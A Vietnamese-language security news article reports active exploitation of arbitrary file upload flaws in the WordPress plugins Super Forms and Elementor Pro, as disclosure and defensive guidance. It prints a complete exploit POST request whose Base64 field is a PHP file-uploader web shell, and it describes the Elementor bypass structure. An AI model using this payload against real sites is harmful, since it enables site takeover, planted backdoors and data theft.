Các tác nhân đe dọa đang tích cực khai thác hai lỗi bảo mật nghiêm trọng trong các plugin WordPress phổ biến là Super Forms và Elementor Pro, theo những phát hiện mới nhất từ Wordfence.
Các lỗ hổng đang được đề cập bao gồm:
- CVE-2026-14894 (Điểm CVSS: 9.8) - Một lỗ hổng thiếu xác thực loại tệp trong Super Forms – Drag & Drop Form Builder, cho phép những kẻ tấn công chưa được xác thực tải lên bất kỳ loại tệp nào, bao gồm cả các tệp PHP thực thi, dẫn đến thực thi mã từ xa (RCE). (Đã được khắc phục trong phiên bản 6.3.314)
- CVE-2026-32475 (Điểm CVSS: 9.0/9.8) - Một lỗ hổng trong Elementor Pro cho phép những kẻ tấn công chưa được xác thực tải lên bất kỳ loại tệp nào, bao gồm cả các tệp PHP thực thi, dẫn đến thực thi mã từ xa. (Đã được khắc phục trong phiên bản 4.2.2)
Giống như các lỗ hổng tải lên tệp tùy ý (arbitrary file upload) cùng loại, kẻ tấn công có thể tận dụng chúng để ghi một web shell PHP vào trang web và thực thi mã tùy ý. Sau đó, chúng có thể lạm dụng quyền này để tạo tài khoản quản trị viên, đánh cắp dữ liệu hoặc chiếm quyền kiểm soát toàn bộ trang web WordPress.
Cần lưu ý rằng các chi tiết về CVE-2026-32475 đã được Patchstack tiết lộ vào tháng trước. Việc khai thác thành công yêu cầu trang web mục tiêu phải có ít nhất một trang Elementor đã xuất bản có chứa Form widget với trường File Upload.
Trong một cặp báo cáo được công bố tuần này, Wordfence cho biết họ đã chặn hơn 250.000 và 190.000 nỗ lực khai thác nhắm mục tiêu lần lượt vào CVE-2026-14894 và CVE-2026-32475.
Khai thác nhắm vào CVE-2026-14894
Trong các cuộc tấn công khai thác CVE-2026-14894, các tác nhân đe dọa đã được phát hiện gửi một yêu cầu HTTP POST tới "/wp-admin/admin-ajax.php" bằng cách sử dụng endpoint "super_submit_form", chứa một trường tệp với payload PHP được mã hóa Base64 và tên tệp do kẻ tấn công kiểm soát như bên dưới:
action=super_submit_form&form_id=2&sf_nonce=04c3aa2046&data={"sf_upload_field": {"type": "files", "files": [{"datauristring": "data:image/gif;base64,PD9waHAgaWYoaXNzZXQoJF9GSUxFU1siZmlsZSJdKSl7JHRhcmdldD1iYXNlbmFtZSgkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7aWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwkdGFyZ2V0KSl7ZWNobyLinIUgVXBsb2FkZWQ6IDxhIGhyZWY9JyR0YXJnZXQnPiR0YXJnZXQ8L2E+Ijt9ZWxzZXtlY2hvIuKdjCBVcGxvYWQgZmFpbGVkISI7fWV4aXQ7fT8+PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPk11c2hyMDB3IFVwbG9hZGVyPC90aXRsZT48L2hlYWQ+PGJvZHkgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZTtkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1pdGVtczpjZW50ZXI7aGVpZ2h0OjEwMHZoO21hcmdpbjowOyI+PGZvcm0gbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBzdHlsZT0iYmFja2dyb3VuZDojMTExO3BhZGRpbmc6NDBweDtib3JkZXI6MnB4IHNvbGlkICMwMGZmMDA7Ym9yZGVyLXJhZGl1czoxMHB4O3RleHQtYWxpZ246Y2VudGVyOyI+PGgyPvCfk6QgVVBMT0FEPC9oMj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgcmVxdWlyZWQgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2JvcmRlcjoxcHggc29saWQgIzAwZmYwMDtwYWRkaW5nOjEwcHg7Ym9yZGVyLXJhZGl1czo1cHg7Ij48YnI+PGJyPjxidXR0b24gdHlwZT0ic3VibWl0IiBzdHlsZT0iYmFja2dyb3VuZDojMDBmZjAwO2NvbG9yOiMwYTBhMGE7cGFkZGluZzoxMHB4IDMwcHg7Ym9yZGVyOm5vbmU7Ym9yZGVyLXJhZGl1czo1cHg7Zm9udC13ZWlnaHQ6Ym9sZDtjdXJzb3I6cG9pbnRlcjsiPuKshiBVcGxvYWQ8L2J1dHRvbj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4=", "value": "Mushr00w_upl.php", "name": "Mushr00w_upl.php", "label": "attachment"}]}}
Tệp được tải lên, mặc dù được bắt đầu bằng loại nội dung "data:image/gif;base64", thực chất là một web shell tải tệp PHP ("Mushr00w_upl.php"), sau đó đóng vai trò là ống dẫn để tải thêm các payload khác lên trang web. Các cuộc tấn công vũ khí hóa plugin Super Forms bắt nguồn từ các địa chỉ IP sau:
- 103.168.147.235
- 103.168.146.131
- 103.154.152.178
- 103.170.97.7
- 182.10.130.51
- 189.4.122.140
- 129.227.46.143
- 64.176.209.104
- 103.164.182.122
- 37.9.33.62
Hoạt động độc hại này được cho là đã bắt đầu vào ngày 14 tháng 7 năm 2026, trước khi đạt đỉnh điểm với hơn 40.000 yêu cầu khai thác vào ngày 18 tháng 8 năm 2026.
Khai thác nhắm vào CVE-2026-32475
"Kẻ tấn công gửi trường File Upload của biểu mẫu dưới dạng một mảng, trong đó phần tử đầu tiên để trống và phần tử thứ hai mang payload PHP với tên tệp .php, đây là cấu trúc kích hoạt việc bỏ qua kiểm tra xác thực," công ty bảo mật WordPress cho biết.
"Sau khi được ghi, tệp PHP đã tải lên được đặt trong thư mục '/wp-content/uploads/elementor/forms/' dưới một tên tệp được tạo ngẫu nhiên với phần mở rộng .php do kẻ tấn công cung cấp, và kẻ tấn công có thể yêu cầu nó trực tiếp để thực thi các lệnh tùy ý trên máy chủ."
Các nỗ lực khai thác nhắm mục tiêu vào CVE-2026-32475 bắt đầu vào ngày 19 tháng 8 năm 2026 và bắt nguồn từ các địa chỉ IP bên dưới:
- 2602:fa59:10:7a1::1
- 185.196.220.85
- 103.84.230.85
- 103.90.148.202
- 216.126.225.208
- 167.254.240.75
- 167.254.241.119
- 114.10.17.253
- 114.10.45.151
- 2406:ef80:2:7d19::1
Các chủ sở hữu trang web WordPress sử dụng hai plugin này được khuyến nghị áp dụng các bản vá lỗi ngay lập tức, quét trang web của họ để tìm các dấu hiệu xâm nhập (IOC) và kiểm tra các tệp .php bất thường hoặc mới được sửa đổi gần đây.